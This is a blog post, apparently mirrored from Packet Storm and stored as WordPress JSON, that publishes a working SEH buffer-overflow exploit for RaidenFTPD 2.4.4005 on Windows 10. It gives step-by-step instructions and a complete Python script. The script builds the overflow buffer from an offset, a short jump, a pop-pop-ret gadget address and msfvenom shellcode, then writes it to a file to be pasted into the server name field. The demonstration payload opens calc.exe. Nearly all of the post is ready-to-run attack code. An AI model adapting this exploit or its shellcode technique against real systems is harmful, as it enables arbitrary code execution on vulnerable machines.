{"id":45404,"date":"2023-07-21T19:03:44","date_gmt":"2023-07-21T15:03:44","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/173674\/raidenftpd244005-overflow.txt"},"modified":"2023-07-22T10:46:26","modified_gmt":"2023-07-22T06:16:26","slug":"raidenftpd-2-4-4005-buffer-overflow","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/raidenftpd-2-4-4005-buffer-overflow\/","title":{"rendered":"RaidenFTPD 2.4.4005 Buffer Overflow"},"content":{"rendered":"<p># Exploit Title: RaidenFTPD 2.4.4005 &#8211; Buffer Overflow (SEH)<br \/>\n# Date: 18\/07\/2023<br \/>\n# Exploit Author: Andre Nogueira<br \/>\n# Vendor Homepage: https:\/\/www.raidenftpd.com\/en\/<br \/>\n# Software Link: http:\/\/www.raidenmaild.com\/download\/raidenftpd2.exe<br \/>\n# Version: RaidenFTPD 2.4.4005<br \/>\n# Tested on: Microsoft Windows 10 Build 19045<\/p>\n<p># 1.- Open RaidenFTPD<br \/>\n# 2.- Click on &#8216;Setup&#8217; -&gt; &#8216;Step by step setup wizard&#8217;<br \/>\n# 3.- Run python code: exploit-raidenftpd.py<br \/>\n# 4.- Paste the content of exploit-raiden.txt into the field &#8216;Server name&#8217;<br \/>\n# 5.- Click &#8216;next&#8217; -&gt; &#8216;next&#8217; -&gt; &#8216;ok&#8217;<br \/>\n# 6.- Pop calc.exe<\/p>\n<p>#!\/usr\/bin\/env python3<br \/>\nfrom struct import pack<\/p>\n<p>crash = 2000<br \/>\noffset = 497<\/p>\n<p># msfvenom -p windows\/exec CMD=&#8221;calc.exe&#8221; -a x86 -f python -v shellcode &#8211;b &#8220;\\x00\\x0d&#8221;<br \/>\nshellcode = b&#8221;\\x90&#8243; * 8<br \/>\nshellcode += b&#8221;\\xb8\\x9c\\x78\\x14\\x60\\xd9\\xc2\\xd9\\x74\\x24\\xf4&#8243;<br \/>\nshellcode += b&#8221;\\x5a\\x33\\xc9\\xb1\\x31\\x83\\xea\\xfc\\x31\\x42\\x0f&#8221;<br \/>\nshellcode += b&#8221;\\x03\\x42\\x93\\x9a\\xe1\\x9c\\x43\\xd8\\x0a\\x5d\\x93&#8243;<br \/>\nshellcode += b&#8221;\\xbd\\x83\\xb8\\xa2\\xfd\\xf0\\xc9\\x94\\xcd\\x73\\x9f&#8221;<br \/>\nshellcode += b&#8221;\\x18\\xa5\\xd6\\x34\\xab\\xcb\\xfe\\x3b\\x1c\\x61\\xd9&#8243;<br \/>\nshellcode += b&#8221;\\x72\\x9d\\xda\\x19\\x14\\x1d\\x21\\x4e\\xf6\\x1c\\xea&#8221;<br \/>\nshellcode += b&#8221;\\x83\\xf7\\x59\\x17\\x69\\xa5\\x32\\x53\\xdc\\x5a\\x37&#8243;<br \/>\nshellcode += b&#8221;\\x29\\xdd\\xd1\\x0b\\xbf\\x65\\x05\\xdb\\xbe\\x44\\x98&#8243;<br \/>\nshellcode += b&#8221;\\x50\\x99\\x46\\x1a\\xb5\\x91\\xce\\x04\\xda\\x9c\\x99&#8243;<br \/>\nshellcode += b&#8221;\\xbf\\x28\\x6a\\x18\\x16\\x61\\x93\\xb7\\x57\\x4e\\x66&#8243;<br \/>\nshellcode += b&#8221;\\xc9\\x90\\x68\\x99\\xbc\\xe8\\x8b\\x24\\xc7\\x2e\\xf6&#8243;<br \/>\nshellcode += b&#8221;\\xf2\\x42\\xb5\\x50\\x70\\xf4\\x11\\x61\\x55\\x63\\xd1&#8243;<br \/>\nshellcode += b&#8221;\\x6d\\x12\\xe7\\xbd\\x71\\xa5\\x24\\xb6\\x8d\\x2e\\xcb&#8221;<br \/>\nshellcode += b&#8221;\\x19\\x04\\x74\\xe8\\xbd\\x4d\\x2e\\x91\\xe4\\x2b\\x81&#8243;<br \/>\nshellcode += b&#8221;\\xae\\xf7\\x94\\x7e\\x0b\\x73\\x38\\x6a\\x26\\xde\\x56&#8243;<br \/>\nshellcode += b&#8221;\\x6d\\xb4\\x64\\x14\\x6d\\xc6\\x66\\x08\\x06\\xf7\\xed&#8221;<br \/>\nshellcode += b&#8221;\\xc7\\x51\\x08\\x24\\xac\\xae\\x42\\x65\\x84\\x26\\x0b&#8221;<br \/>\nshellcode += b&#8221;\\xff\\x95\\x2a\\xac\\xd5\\xd9\\x52\\x2f\\xdc\\xa1\\xa0&#8243;<br \/>\nshellcode += b&#8221;\\x2f\\x95\\xa4\\xed\\xf7\\x45\\xd4\\x7e\\x92\\x69\\x4b&#8221;<br \/>\nshellcode += b&#8221;\\x7e\\xb7\\x09\\x0a\\xec\\x5b\\xe0\\xa9\\x94\\xfe\\xfc&#8221;<\/p>\n<p>nSEH = b&#8221;\\xeb\\x06\\x90\\x90&#8243; # short jump of 8 bytes<br \/>\nSEH = pack(&#8220;&lt;L&#8221;, 0x7c1e76ff) # pop eax; pop esi; ret; =&gt; msvcp70.dll<\/p>\n<p>buffer = b&#8221;A&#8221; * offset<br \/>\nbuffer += nSEH<br \/>\nbuffer += SEH<br \/>\nbuffer += shellcode<br \/>\nbuffer += b&#8221;D&#8221; * (crash -len(buffer))<\/p>\n<p>file_payload = open(&#8220;exploit-raiden.txt&#8221;, &#8216;wb&#8217;)<br \/>\nprint(&#8220;[*] Creating the .txt file for out payload&#8221;)<br \/>\nfile_payload.write(buffer)<br \/>\nprint(&#8220;[*] Writing malicious payload to the .txt file&#8221;)<br \/>\nfile_payload.close()<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: RaidenFTPD 2.4.4005 &#8211; Buffer Overflow (SEH) # Date: 18\/07\/2023 # Exploit Author: Andre Nogueira # Vendor Homepage: https:\/\/www.raidenftpd.com\/en\/ # Software Link: http:\/\/www.raidenmaild.com\/download\/raidenftpd2.exe # Version: RaidenFTPD 2.4.4005 # Tested on: Microsoft Windows 10 Build 19045 # 1.- Open RaidenFTPD # 2.- Click on &#8216;Setup&#8217; -&gt; &#8216;Step by step setup wizard&#8217; # 3.- Run &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45404","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45404","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45404"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45404\/revisions"}],"predecessor-version":[{"id":45440,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45404\/revisions\/45440"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45404"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45404"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45404"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}